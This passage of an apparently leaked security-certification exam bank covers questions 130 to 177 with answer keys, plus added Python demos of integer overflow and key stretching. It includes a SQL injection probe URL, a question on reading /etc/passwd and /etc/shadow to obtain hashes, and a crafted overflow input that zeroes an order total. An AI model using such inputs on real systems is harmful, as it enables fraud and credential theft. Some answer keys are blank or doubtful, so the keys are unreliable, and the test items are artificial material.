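    """After: validate the field against a business range before any arithmetic,
    then check the sum against the storage width."""
    if not shipping_field.isdigit():
        raise ValueError("shipping must be a non-negative integer")
    shipping = int(shipping_field)
    if shipping > MAX_SHIPPING_CENTS:
        raise ValueError("shipping exceeds the allowed maximum")
    total = balance_cents + shipping
    if total > INT32_MAX:
        raise ValueError("total does not fit the storage type")
    return total


if __name__ == "__main__":
    crafted = str(2**32 - 10_000)            # becomes -10000 once truncated to int32
    print("honest:", vulnerable_total(5_000, "1500"))      # 6500
    print("crafted:", vulnerable_total(5_000, crafted))    # 0: goods ship for free
    try:
        hardened_total(5_000, crafted)
    except ValueError as err:
        print("hardened rejects:", err)
```

Two crafted inputs trigger the flaw: a value just below 2^32 that truncates to a small negative shipping charge, and a value near INT32_MAX that is positive on its own but wraps the sum. The hardened version rejects both because the check is on the input's meaning (a shipping charge) rather than on the result.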

Section: (none)
Explanation

Explanation/Reference:

QUESTION 130
A network engineer wants to deploy user-based authentication across the company's wired and wireless infrastructure at layer 2 of the OSI model. Company policies require that users be centrally managed and authenticated and that each user's network access be controlled based on the user's role within the company. Additionally, the central authentication system must support hierarchical trust and the ability to natively authenticate mobile devices and workstations. Which of the following are needed to implement these requirements? (Select TWO).

A. SAML
B. WAYF
C. LDAP
D. RADIUS
E. Shibboleth
F. PKI

Correct Answer: CD
Section: (none)
Explanation

Explanation/Reference:

QUESTION 131
An insurance company has an online quoting system for insurance premiums. It allows potential customers to fill in certain details about their car and obtain a quote. During an investigation, the following patterns were detected:
Pattern 1: Analysis of the logs identifies that insurance premium forms are being filled in but only single fields are incrementally being updated.
Pattern 2: For every quote completed, a new customer number is created; due to legacy systems, customer numbers are running out.
Which of the following is the attack type the system is susceptible to, and what is the BEST way to defend against it? (Select TWO).

A. Apply a hidden field that triggers a SIEM alert
B. Cross site scripting attack
C. Resource exhaustion attack
D. Input a blacklist of all known BOT malware IPs into the firewall
E. SQL injection
F. Implement an inline WAF and integrate into SIEM
G. Distributed denial of service
H. Implement firewall rules to block the attacking IP addresses

Correct Answer: CF
Section: (none)
Explanation

Explanation/Reference:

QUESTION 132
A finance manager says that the company needs to ensure that the new system can "replay" data, up to the minute, for every exchange being tracked by the investment departments. The finance manager also states that the company's transactions need to be tracked against this data for a period of five years for compliance. How would a security engineer BEST interpret the finance manager's needs?

A. Compliance standards
B. User requirements
C. Data elements
D. Data storage
E. Acceptance testing
F. Information digest
G. System requirements

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 133
A company Chief Information Officer (CIO) is unsure which set of standards should govern the company's IT policy. The CIO has hired consultants to develop use cases to test against various government and industry security standards. The CIO is convinced that there is large overlap between the configuration checks and security controls governing each set of standards. Which of the following selections represent the BEST option for the CIO?

A. Issue a RFI for vendors to determine which set of security standards is best for the company.
B. Issue a policy that requires only the most stringent security standards be implemented throughout the company.
C. Issue a policy specifying best practice security standards and a baseline to be implemented across the company.
D. Issue a RFQ for vendors to quote a complete vulnerability and risk management solution to the company.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 134
An administrator has enabled salting for users' passwords on a UNIX box. A penetration tester must attempt to retrieve password hashes. Which of the following files must the penetration tester use to eventually obtain passwords on the system? (Select TWO).

A. /etc/passwd
B. /etc/shadow
C. /etc/security
D. /etc/password
E. /sbin/logon
F. /bin/bash

Correct Answer: AB
Section: (none)
Explanation

Explanation/Reference:

QUESTION 135
A business unit of a large enterprise has outsourced the hosting and development of a new external website which will be accessed by premium customers, in order to speed up the time to market timeline. Which of the following is the MOST appropriate?

A. The external party providing the hosting and website development should be obligated under contract to provide a secure service which is regularly tested (vulnerability and penetration). SLAs should be in place for the resolution of newly identified vulnerabilities and a guaranteed uptime.
B. The use of external organizations to provide hosting and web development services is not recommended as the costs are typically higher than what can be achieved internally. In addition, compliance with privacy regulations becomes more complex and guaranteed uptimes are difficult to track and measure.
C. Outsourcing transfers the risk to the third party. An SLA should be in place for the resolution of newly identified vulnerabilities and penetration / vulnerability testing should be conducted regularly.
D. Outsourcing transfers all the risk to the third party, thereby minimizing the cost and any legal obligations. An MOU should be in place for the resolution of newly identified vulnerabilities and penetration / vulnerability testing should be conducted regularly.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 136
Which of the following technologies prevents an unauthorized HBA from viewing iSCSI target information?

A. Deduplication
B. Data snapshots
C. LUN masking
D. Storage multipaths

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 137
An administrator is tasked with securing several website domains on a web server. The administrator elects to secure www.example.org, mail.example.com, archive.example.com, and www.example.com with the same certificate. Which of the following would allow the administrator to secure those domains with a single issued certificate?

A. Intermediate Root Certificate
B. Wildcard Certificate
C. EV x509 Certificate
D. Subject Alternative Names Certificate

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 138
Joe is a security architect who is tasked with choosing a new NIPS platform that has the ability to perform SSL inspection, analyze up to 10Gbps of traffic, can be centrally managed and only reveals inspected application payload data to specified internal security employees. Which of the following steps should Joe take to reach the desired outcome?

A. Research new technology vendors to look for potential products. Contribute to an RFP and then evaluate RFP responses to ensure that the vendor product meets all mandatory requirements. Test the product and make a product recommendation.
B. Evaluate relevant RFC and ISO standards to choose an appropriate vendor product. Research industry surveys, interview existing customers of the product and then recommend that the product be purchased.
C. Consider outsourcing the product evaluation and ongoing management to an outsourced provider on the basis that each of the requirements are met and a lower total cost of ownership (TCO) is achieved.
D. Choose a popular NIPS product and then consider outsourcing the ongoing device management to a cloud provider. Give access to internal security employees so that they can inspect the application payload data.
E. Ensure that the NIPS platform can also deal with recent technological advancements, such as threats emerging from social media, BYOD and cloud storage prior to purchasing the product.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 139
The IT Security Analyst for a small organization is working on a customer's system and identifies a possible intrusion in a database that contains PII. Since PII is involved, the analyst wants to get the issue addressed as soon as possible. Which of the following is the FIRST step the analyst should take in mitigating the impact of the potential intrusion?

A. Contact the local authorities so an investigation can be started as quickly as possible.
B. Shut down the production network interfaces on the server and change all of the DBMS account passwords.
C. Disable the front-end web server and notify the customer by email to determine how the customer would like to proceed.
D. Refer the issue to management for handling according to the incident response process.

Correct Answer: D
Section: (none)

Explanation

Explanation/Reference:

QUESTION 140
The telecommunications manager wants to improve the process for assigning company-owned mobile devices and ensuring data is properly removed when no longer needed. Additionally, the manager wants to onboard and offboard personally owned mobile devices that will be used in the BYOD initiative. Which of the following should be implemented to ensure these processes can be automated? (Select THREE).

A. SIM's PIN
B. Remote wiping
C. Chargeback system
D. MDM software
E. Presence software
F. Email profiles
G. Identity attestation
H. GPS tracking

Correct Answer: BDG
Section: (none)
Explanation

Explanation/Reference:

QUESTION 141
During an incident involving the company main database, a team of forensics experts is hired to respond to the breach. The team is in charge of collecting forensics evidence from the company's database server. Which of the following is the correct order in which the forensics team should engage?

A. Notify senior management, secure the scene, capture volatile storage, capture non-volatile storage, implement chain of custody, and analyze original media.
B. Take inventory, secure the scene, capture RAM, capture hard drive, implement chain of custody, document, and analyze the data.
C. Implement chain of custody, take inventory, secure the scene, capture volatile and non-volatile storage, and document the findings.
D. Secure the scene, take inventory, capture volatile storage, capture non-volatile storage, document, and implement chain of custody.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 142
An employee is performing a review of the organization's security functions and noticed that there is some cross over responsibility between the IT security team and the financial fraud team. Which of the following security documents should be used to clarify the roles and responsibilities between the teams?

A. BPA
B. BIA
C. MOU
D. OLA

Correct Answer:
Section: (none)
Explanation

Explanation/Reference:

QUESTION 143
A trucking company delivers products all over the country. The executives at the company would like to have better insight into the location of their drivers to ensure the shipments are following secure routes. Which of the following would BEST help the executives meet this goal?

A. Install GSM tracking on each product for end-to-end delivery visibility.
B. Implement geo-fencing to track products.
C. Equip each truck with an RFID tag for location services.
D. Require drivers to geo-tag documentation at each delivery location.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 144
A system worth $100,000 has an exposure factor of eight percent and an ARO of four. Which of the following figures is the system's SLE?

A. $2,000
B. $8,000
C. $12,000
D. $32,000

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 145
Customers have recently reported incomplete purchase history and other anomalies while accessing their account history on the web server farm. Upon investigation, it has been determined that there are version mismatches of key e-commerce applications on the production web servers. The development team has direct access to the production servers and is most likely the cause of the different release versions. Which of the following process level solutions would address this problem?

A. Implement change control practices at the organization level.
B. Adjust the firewall ACL to prohibit development from directly accessing the production server farm.
C. Update the vulnerability management plan to address data discrepancy issues.
D. Change development methodology from strict waterfall to agile.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 146
Using SSL, an administrator wishes to secure public facing server farms in three subdomains: dc1.east.company.com, dc2.central.company.com, and dc3.west.company.com. Which of the following is the number of wildcard SSL certificates that should be purchased?

A. 0
B. 1
C. 3
D. 6

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 147
Since the implementation of IPv6 on the company network, the security administrator has been unable to identify the users associated with certain devices utilizing IPv6 addresses, even when the devices are centrally managed.

en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu
        ether f8:1e:af:ab:10:a3
        inet6 fe80::fa1e:dfff:fee6:9d8%en1 prefixlen 64 scopeid 0x5
        inet 192.168.1.14 netmask 0xffffff00 broadcast 192.168.1.255
        inet6 2001:200:5:922:1035:dfff:fee6:9dfe prefixlen 64 autoconf
        inet6 2001:200:5:922:10ab:5e21:aa9a:6393 prefixlen 64 autoconf temporary
        nd6 options=1<PERFORMNUD>
        media: autoselect
        status: active

Given this output, which of the following protocols is in use by the company and what can the system administrator do to positively map users with IPv6 addresses in the future? (Select TWO).

A. The devices use EUI-64 format
B. The routers implement NDP
C. The network implements 6to4 tunneling
D. The router IPv6 advertisement has been disabled
E. The administrator must disable IPv6 tunneling
F. The administrator must disable the mobile IPv6 router flag
G. The administrator must disable the IPv6 privacy extensions
H. The administrator must disable DHCPv6 option code 1

Correct Answer: BG
Section: (none)
Explanation

Explanation/Reference:

QUESTION 148
A facilities manager has observed varying electric use on the company's metered service lines. The facility management rarely interacts with the IT department unless new equipment is being delivered. However, the facility manager thinks that there is a correlation between spikes in electric use and IT department activity. Which of the following business processes and/or practices would provide better management of organizational resources with the IT department's needs? (Select TWO).

A. Deploying a radio frequency identification tagging asset management system
B. Designing a business resource monitoring system
C. Hiring a property custodian
D. Purchasing software asset management software
E. Facility management participation on a change control board
F. Rewriting the change board charter
G. Implementation of change management best practices

Correct Answer: EG
Section: (none)
Explanation

Explanation/Reference:

QUESTION 149
A company is trying to decide how to manage hosts in a branch location connected via a slow WAN link. The company desires to provide the same level of performance and functionality to the branch office as it provides to the main campus. The company uses Active Directory for its directory service and host configuration management. The branch location does not have a datacenter, and the physical security posture of the building is weak. Which of the following designs is MOST appropriate for this scenario?

A. Deploy a corporate Read-Only Domain Controller to the branch location.
B. Deploy a corporate Domain Controller to the branch location.
C. Deploy a corporate Domain Controller in the DMZ at the main campus.
D. Deploy a branch location Read-Only Domain Controller to the branch office location with a one-way trust.
E. Deploy a branch location Domain Controller to the branch location with a one-way trust.
F. Deploy a branch location Read-Only Domain Controller in the DMZ at the main campus with a two-way trust.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 150
An IT manager is working with a project manager from another subsidiary of the same multinational organization. The project manager is responsible for a new software development effort that is being outsourced overseas, while customer acceptance testing will be performed in house. Which of the following capabilities is MOST likely to cause issues with network availability?

A. Source code vulnerability scanning
B. Time-based access control lists
C. ISP to ISP network jitter
D. File-size validation
E. End to end network encryption

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 151
The helpdesk is receiving multiple calls about slow and intermittent Internet access from the finance department. The following information is compiled:

Caller 1, IP 172.16.35.217, NETMASK 255.255.255.0
Caller 2, IP 172.16.35.53, NETMASK 255.255.255.0
Caller 3, IP 172.16.35.173, NETMASK 255.255.255.0

All callers are connected to the same switch and are routed by a router with five built-in interfaces. The upstream router interface's MAC is 00-01-42-32-ab-1a
A packet capture shows the following:

09:05:15.934840 arp reply 172.16.35.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a)
09:06:16.124850 arp reply 172.16.35.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a)
09:07:25.439811 arp reply 172.16.35.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a)
09:08:10.937590 IP 172.16.35.1 > 172.16.35.255: ICMP echo request, id 2305, seq 1, length 65534
09:08:10.937591 IP 172.16.35.1 > 172.16.35.255: ICMP echo request, id 2306, seq 2, length 65534
09:08:10.937592 IP 172.16.35.1 > 172.16.35.255: ICMP echo request, id 2307, seq 3, length 65534

Which of the following is occurring on the network?

A. A man-in-the-middle attack is underway on the network.
B. The default gateway is being spoofed on the network.
C. An ARP flood attack is targeting at the router.
D. A denial of service attack is targeting at the router.

Correct Answer: D
Section: (none)

Explanation

Explanation/Reference:

QUESTION 152
A storage as a service company implements both encryption at rest as well as encryption in transit of customers' data. The security administrator is concerned with
the overall security of the encrypted customer data stored by the company servers and wants the development team to implement a solution that will strengthen the
customer's encryption key. Which of the following, if implemented, will MOST increase the time an offline password attack against the customers' data would take?

A. key = NULL ; for (int i=0; i<5000; i++) { key = sha(key + password) }
B. password = NULL ; for (int i=0; i<10000; i++) { password = sha256(key) }
C. password = password + sha(password+salt) + aes256(password+salt)
D. key = aes128(sha256(password), password))

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 153
An investigator wants to collect the most volatile data first in an incident to preserve the data that runs the highest risk of being lost. After memory, which of the
following BEST represents the remaining order of volatility that the investigator should follow?

A. File system information, swap files, network processes, system processes and raw disk blocks.
B. Raw disk blocks, network processes, system processes, swap files and file system information.
C. System processes, network processes, file system information, swap files and raw disk blocks.
D. Raw disk blocks, swap files, network processes, system processes, and file system information.

Correct Answer: C
Section: (none)
Explanation
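Why option A in QUESTION 152 is the right one, as an added Python illustration (not part of the exam dump): the chained construction makes every password guess cost the full round count, whereas option B as written never feeds the password into the loop at all. SHA-256 is assumed for the unspecified "sha", the starting value for key is assumed to be empty, and the function and constant names are my own.

```python
import hashlib
import hmac


def derive_key_option_a(password: bytes, iterations: int = 5000) -> bytes:
    """Option A: key = NULL; key = sha(key + password), repeated `iterations` times.

    Each round consumes the previous round's output, so the chain is strictly
    sequential: testing one candidate password costs `iterations` hash calls and
    there is no shortcut. SHA-256 stands in for the unspecified "sha" (assumption).
    """
    key = b""  # NULL
    for _ in range(iterations):
        key = hashlib.sha256(key + password).digest()
    return key


def derive_key_option_b(password: bytes, iterations: int = 10000) -> bytes:
    """Option B as written: password = NULL; password = sha256(key), repeated.

    The loop only hashes `key`, which the option never derives from the user's
    input (assumed to start empty, as nothing else is given), so the result is
    identical for every password: ten thousand rounds buy no protection at all.
    """
    key = b""          # never updated inside the loop
    derived = b""
    for _ in range(iterations):
        derived = hashlib.sha256(key).digest()
    return derived     # independent of `password`


def verify_password(candidate: bytes, stored_key: bytes, iterations: int = 5000) -> bool:
    """Re-derive with the same parameters and compare in constant time."""
    return hmac.compare_digest(derive_key_option_a(candidate, iterations), stored_key)


def attacker_hash_count(candidate_passwords: int, iterations: int) -> int:
    """Hashes an offline attacker must compute to test a wordlist of the given size:
    linear in the round count, which is exactly what key stretching buys."""
    return candidate_passwords * iterations


if __name__ == "__main__":
    stored = derive_key_option_a(b"correct horse")
    print("verify ok:", verify_password(b"correct horse", stored))
    print("option B same for two passwords:",
          derive_key_option_b(b"a") == derive_key_option_b(b"b"))
    print("hashes for 1M guesses at 5000 rounds:", attacker_hash_count(1_000_000, 5000))
```

Raising the round count is the knob: the legitimate user pays it once per login, the attacker pays it once per guess.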

Explanation/Reference:

QUESTION 154
ABC Company must achieve compliance for PCI and SOX. Which of the following would BEST allow the organization to achieve compliance and ensure security?
(Select THREE).

A. Establish a list of users that must work with each regulation
B. Establish a list of devices that must meet each regulation
C. Centralize management of all devices on the network
D. Compartmentalize the network
E. Establish a company framework
F. Apply technical controls to meet compliance with the regulation

Correct Answer: BDF
Section: (none)
Explanation

Explanation/Reference:

QUESTION 155
A vulnerability scanner report shows that a client-server host monitoring solution operating in the credit card corporate environment is managing SSL sessions with
a weak algorithm which does not meet corporate policy. Which of the following are true statements? (Select TWO).

A. The X509 V3 certificate was issued by a non trusted public CA.
B. The client-server handshake could not negotiate strong ciphers.
C. The client-server handshake is configured with a wrong priority.
D. The client-server handshake is based on TLS authentication.
E. The X509 V3 certificate is expired.
F. The client-server implements client-server mutual authentication with different certificates.

Correct Answer: BC
Section: (none)
Explanation

Explanation/Reference:

QUESTION 156
A medical device manufacturer has decided to work with another international organization to develop the software for a new robotic surgical platform to be
introduced into hospitals within the next 12 months. In order to ensure a competitor does not become aware, management at the medical device manufacturer has
decided to keep it secret until formal contracts are signed. Which of the following documents is MOST likely to contain a description of the initial terms and
arrangement and is not legally enforceable?

A. OLA
B. BPA
C. SLA
D. SOA
E. MOU

Correct Answer: E
Section: (none)
Explanation

Explanation/Reference:

QUESTION 157
A risk manager has decided to use likelihood and consequence to determine the risk of an event occurring to a company asset. Which of the following is a limitation
of this approach to risk management?

A. Subjective and based on an individual's experience.
B. Requires a high degree of upfront work to gather environment details.
C. Difficult to differentiate between high, medium, and low risks.
D. Allows for cost and benefit analysis.
E. Calculations can be extremely complex to manage.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 158
A web developer is responsible for a simple web application that books holiday accommodations. The front-facing web server offers an HTML form, which asks for a
user's age. This input gets placed into a signed integer variable and is then checked to ensure that the user is in the adult age range. Users have reported that the
website is not functioning correctly. The web developer has inspected log files and sees that a very large number (in the billions) was submitted just before the issue
started occurring. Which of the following is the MOST likely situation that has occurred?

A. The age variable stored the large number and filled up disk space which stopped the application from continuing to function. Improper error handling prevented
the application from recovering.
B. The age variable has had an integer overflow and was assigned a very small negative number which led to unpredictable application behavior. Improper error
handling prevented the application from recovering.
C. Computers are able to store numbers well above "billions" in size. Therefore, the website issues are not related to the large number being input.
D. The application has crashed because a very large integer has lead to a "divide by zero". Improper error handling prevented the application from recovering.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 159
A security administrator is tasked with increasing the availability of the storage networks while enhancing the performance of existing applications. Which of the
following technologies should the administrator implement to meet these goals? (Select TWO).

A. LUN masking
B. Snapshots
C. vSAN
D. Dynamic disk pools
E. Multipath
F. Deduplication

Correct Answer: DE
Section: (none)
Explanation

Explanation/Reference:
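The overflow in QUESTION 158, reproduced as an added Python example (not from the exam dump): a value in the billions assigned to a 32-bit signed integer wraps to a negative number, and the fix is to validate the submitted string against an explicit range before it ever reaches fixed-width storage. The age bounds, function names and the use of ctypes to emulate a C int are my own assumptions.

```python
import ctypes
from typing import Optional

ADULT_MIN_AGE = 18        # assumed lower bound of the "adult age range"
MAX_PLAUSIBLE_AGE = 130   # assumed upper bound; the question gives no figure


def store_in_signed_int32(value: int) -> int:
    """Emulate assigning an arbitrary integer to a C `int` (32-bit two's complement).
    ctypes truncates to 32 bits silently, which is the wrap-around the question describes."""
    return ctypes.c_int32(value).value


def naive_age_check(submitted: str) -> int:
    """The flawed flow: parse the form field, drop it into a signed 32-bit variable, and
    only then reason about it. A number in the billions has already wrapped (possibly to
    a negative value) by the time any range check runs, so later logic works on garbage."""
    return store_in_signed_int32(int(submitted))


def validated_age(submitted: str) -> Optional[int]:
    """Hardened flow: validate the *string* before any fixed-width storage.
    Returns the age, or None when the input is not a plausible adult age."""
    s = submitted.strip()
    if not s.isdigit() or len(s) > 3:      # no sign, no exponent, no ten-digit "ages"
        return None
    age = int(s)
    if not ADULT_MIN_AGE <= age <= MAX_PLAUSIBLE_AGE:
        return None
    return age


if __name__ == "__main__":
    huge = "3000000000"
    print("naive check stores:", naive_age_check(huge))      # a large negative number
    print("validated:", validated_age(huge))                 # None: rejected up front
    print("validated:", validated_age("25"))                 # 25
```

The length-and-range test on the string is what keeps the wrapped value out of the program entirely; bounding after the assignment would already be too late.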

QUESTION 160
A new IT company has hired a security consultant to implement a remote access system, which will enable employees to telecommute from home using both company
issued as well as personal computing devices, including mobile devices. The company wants a flexible system to provide confidentiality and integrity for data in transit
to the company's internally developed application GUI. Company policy prohibits employees from having administrative rights to company issued devices. Which of
the following remote access solutions has the lowest technical complexity?

A. RDP server
B. Client-based VPN
C. IPSec
D. Jump box
E. SSL VPN

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 161
Wireless users are reporting issues with the company's video conferencing and VoIP systems. The security administrator notices internal DoS attacks from infected
PCs on the network causing the VoIP system to drop calls. The security administrator also notices that the SIP servers are unavailable during these attacks. Which of
the following security controls will MOST likely mitigate the VoIP DoS attacks on the network? (Select TWO).

A. Install a HIPS on the SIP servers
B. Configure 802.1X on the network
C. Update the corporate firewall to block attacking addresses
D. Configure 802.11e on the network
E. Configure 802.1q on the network

Correct Answer: AD
Section: (none)
Explanation

Explanation/Reference:

QUESTION 162
The latest independent research shows that cyber attacks involving SCADA systems grew an average of 15% per year in each of the last four years, but that this year's
growth has slowed to around 7%. Over the same time period, the number of attacks against applications has decreased or stayed flat each year. At the start of the
measure period, the incidence of PC boot loader or BIOS based attacks was negligible. Starting two years ago, the growth in the number of PC boot loader attacks has
grown exponentially. Analysis of these trends would seem to suggest which of the following strategies should be employed?

A. Spending on SCADA protections should stay steady; application control spending should increase substantially and spending on PC boot loader controls should
increase substantially.
B. Spending on SCADA security controls should stay steady; application control spending should decrease slightly and spending on PC boot loader protections should
increase substantially.
C. Spending on all controls should increase by 15% to start; spending on application controls should be suspended, and PC boot loader protection research should
increase by 100%.
D. Spending on SCADA security controls should increase by 15%; application control spending should increase slightly, and spending on PC boot loader protections
should remain steady.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 163
An accountant at a small business is trying to understand the value of a server to determine if the business can afford to buy another server for DR. The risk manager only
provided the accountant with the SLE of $24,000, ARO of 20% and the exposure factor of 25%. Which of the following is the correct asset value calculated by the
accountant?

A. $4,800
B. $24,000
C. $96,000
D. $120,000

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 164
Which of the following would be used in forensic analysis of a compromised Linux system? (Select THREE).

A. Check log files for logins from unauthorized IPs.
B. Check /proc/kmem for fragmented memory segments.
C. Check for unencrypted passwords in /etc/shadow.
D. Check timestamps for files modified around time of compromise.
E. Use lsof to determine files with future timestamps.
F. Use gpg to encrypt compromised data files.
G. Verify the MD5 checksum of system binaries.
H. Use vmstat to look for excessive disk I/O.

Correct Answer: ADG
Section: (none)
Explanation

Explanation/Reference:

QUESTION 165
A security tester is testing a website and performs the following manual query:
https://www.comptia.com/cookies.jsp?products=5%20and%201=1 The following response is received in the payload: "ORA-000001: SQL command not properly ended"
Which of the following is the response an example of?

A. Fingerprinting
B. Cross-site scripting
C. SQL injection
D. Privilege escalation

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 166

In a situation where data is to be recovered from an attacker's location, which of the following are the FIRST things to capture? (Select TWO).

A. Removable media
B. Passwords written on scrap paper
C. Snapshots of data on the monitor
D. Documents on the printer
E. Volatile system memory
F. System hard drive

Correct Answer: CE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 167
Joe, a penetration tester, is tasked with testing the security robustness of the protocol between a mobile web application and a RESTful application server. Which of the
following security tools would be required to assess the security between the mobile web application and the RESTful application server? (Select TWO).

A. Jailbroken mobile device
B. Reconnaissance tools
C. Network enumerator
D. HTTP interceptor
E. Vulnerability scanner
F. Password cracker

Correct Answer: DE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 168
CORRECT TEXT

Company A has noticed abnormal behavior targeting their SQL server on the network from a rogue IP address. The company uses the following internal IP address
ranges: 192.10.1.0/24 for the corporate site and 192.10.2.0/24 for the remote site. The Telco router interface uses the 192.10.5.0/30 IP range.

Instructions: Click on the simulation button to refer to the Network Diagram for Company A. Click on Router 1, Router 2, and the Firewall to evaluate and configure
each device.

Task 1: Display and examine the logs and status of Router 1, Router 2, and Firewall interfaces.

Task 2: Reconfigure the appropriate devices to prevent the attacks from continuing to target the SQL server and other servers on the corporate network.

A.
B.
C.
D.

Correct Answer:
Section: (none)
Explanation

Explanation/Reference:
Please check the explanation part for the solution.

QUESTION 169
CORRECT TEXT

Compliance with company policy requires a quarterly review of firewall rules. A new administrator is asked to conduct this review on the internal firewall sitting
between several Internal networks. The intent of this firewall is to make traffic more restrictive. Given the following information answer the questions below:

User Subnet: 192.168.1.0/24
Server Subnet: 192.168.2.0/24
Finance Subnet: 192.168.3.0/24

Instructions: To perform the necessary tasks, please modify the DST port, Protocol, Action, and/or Rule Order columns. Firewall ACLs are read from the top down.

Task 1) An administrator added a rule to allow their machine terminal server access to the server subnet. This rule is not working. Identify the rule and correct this
issue.

Task 2) All web servers have been changed to communicate solely over SSL. Modify the appropriate rule to allow communications.

Task 3) An administrator added a rule to block access to the SQL server from anywhere on the network. This rule is not working. Identify and correct this issue.

Task 4) Other than allowing all hosts to do network time and SSL, modify a rule to ensure that no other traffic is allowed.


A.
B.
C.
D.

Correct Answer:
Section: (none)
Explanation

Explanation/Reference:
Please look into the explanation for the solution to this question.

QUESTION 170
A recently hired security administrator is advising developers about the secure integration of a legacy in-house application with a new cloud based processing
system. The systems must exchange large amounts of fixed format data such as names, addresses, and phone numbers, as well as occasional chunks of data in
unpredictable formats. The developers want to construct a new data format and create custom tools to parse and process the data. The security administrator
instead suggests that the developers:

A. Create a custom standard to define the data.
B. Use well formed standard compliant XML and strict schemas.
C. Only document the data format in the parsing application code.
D. Implement a de facto corporate standard for all analyzed data.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 171
An international shipping company discovered that deliveries left idle are being tampered with. The company wants to reduce the idle time associated with
international deliveries by ensuring that personnel are automatically notified when an inbound delivery arrives at the transit dock. Which of the following should be
implemented to help the company increase the security posture of its operations?

A. Back office database
B. Asset tracking
C. Geo-fencing
D. Barcode scanner

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 172
An organization has several production critical SCADA supervisory systems that cannot follow the normal 30-day patching policy. Which of the following BEST
maximizes the protection of these systems from malicious software?

A. Configure a firewall with deep packet inspection that restricts traffic to the systems
B. Configure a separate zone for the systems and restrict access to known ports
C. Configure the systems to ensure only necessary applications are able to run
D. Configure the host firewall to ensure only the necessary applications have listening ports

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 173
An educational institution would like to make computer labs available to remote students. The labs are used for various IT networking, security, and programming
courses. The requirements are:

1. Each lab must be on a separate network segment.
2. Labs must have access to the Internet, but not other lab networks.
3. Student devices must have network access, not simple access to hosts on the lab networks.
4. Students must have a private certificate installed before gaining access.
5. Servers must have a private certificate installed locally to provide assurance to the students.
6. All students must use the same VPN connection profile.

Which of the following components should be used to achieve the design in conjunction with directory services?

A. L2TP VPN over TLS for remote connectivity, SAML for federated authentication, firewalls between each lab segment
B. SSL VPN for remote connectivity, directory services groups for each lab group, ACLs on routing equipment
C. IPSec VPN with mutual authentication for remote connectivity, RADIUS for authentication, ACLs on network equipment
D. Cloud service remote access tool for remote connectivity, OAuth for authentication, ACL on routing equipment

Correct Answer: C
Section: (none)

Explanation

Explanation/Reference:

QUESTION 174
Company ABC is hiring customer service representatives from Company XYZ. The representatives reside at Company XYZ's headquarters. Which of the following
BEST prevents Company XYZ representatives from gaining access to unauthorized Company ABC systems?

A. Require each Company XYZ employee to use an IPSec connection to the required systems
B. Require Company XYZ employees to establish an encrypted VDI session to the required systems
C. Require Company ABC employees to use two-factor authentication on the required systems
D. Require a site-to-site VPN for intercompany communications

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 175
DRAG DROP

An organization is implementing a project to simplify the management of its firewall network flows and implement security controls. The following requirements
exist. Drag and drop the BEST security solution to meet the given requirements. Options may be used once or not at all. All placeholders must be filled.


A.
B.
C.
D.

Correct Answer:
Section: (none)
Explanation

Explanation/Reference:


QUESTION 176
VPN users cannot access the active FTP server through the router but can access any server in the data center.

Additional network information:
DMZ network - 192.168.1.0/24 (FTP server is 192.168.1.11)
VPN network - 192.168.2.0/24
Datacenter - 192.168.3.0/24
User network - 192.168.4.0/24
HR network - 192.168.5.0/24

Traffic shaper configuration:
VLAN      Bandwidth Limit (Mbps)
VPN       50
User      175
HR        250
Finance   250
Guest     0

Router ACL:
Action   Source            Destination
Permit   192.168.2.0/24    192.168.3.0/24
Permit   192.168.3.0/24    192.168.2.0/24
Permit   192.168.2.0/24    192.168.4.0/24
Permit   192.168.4.0/24    192.168.2.0/24
Permit   192.168.2.0/24    192.168.1.0/24
Permit   192.168.1.1/32    192.168.2.0/24
Deny     192.168.5.0/24    192.168.2.0/24
Deny     192.168.2.0/24    192.168.5.0/24
Deny     any               any

Which of the following solutions would allow the users to access the active FTP server?

A. Add a permit statement to allow traffic from 192.168.1.0/24 to the VPN network
B. Add a permit statement to allow traffic to 192.168.1.1 from the VPN network
C. IPS is blocking traffic and needs to be reconfigured
D. Configure the traffic shaper to limit DMZ traffic
E. Increase bandwidth limit on the VPN network

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 177
A security solutions architect has argued consistently to implement the most secure method of encrypting corporate messages. The solution has been derided as
not being cost effective by other members of the IT department. The proposed solution uses symmetric keys to encrypt all messages and is very resistant to
unauthorized decryption. The method also requires special handling and security for all key material that goes above and beyond most encryption systems. Which
of the following is the solutions architect MOST likely trying to implement?

A. One time pads
B. PKI
C. Quantum cryptography
D. Digital rights management

Correct Answer: A

Section: (none)
Explanation

Explanation/Reference:

QUESTION 178
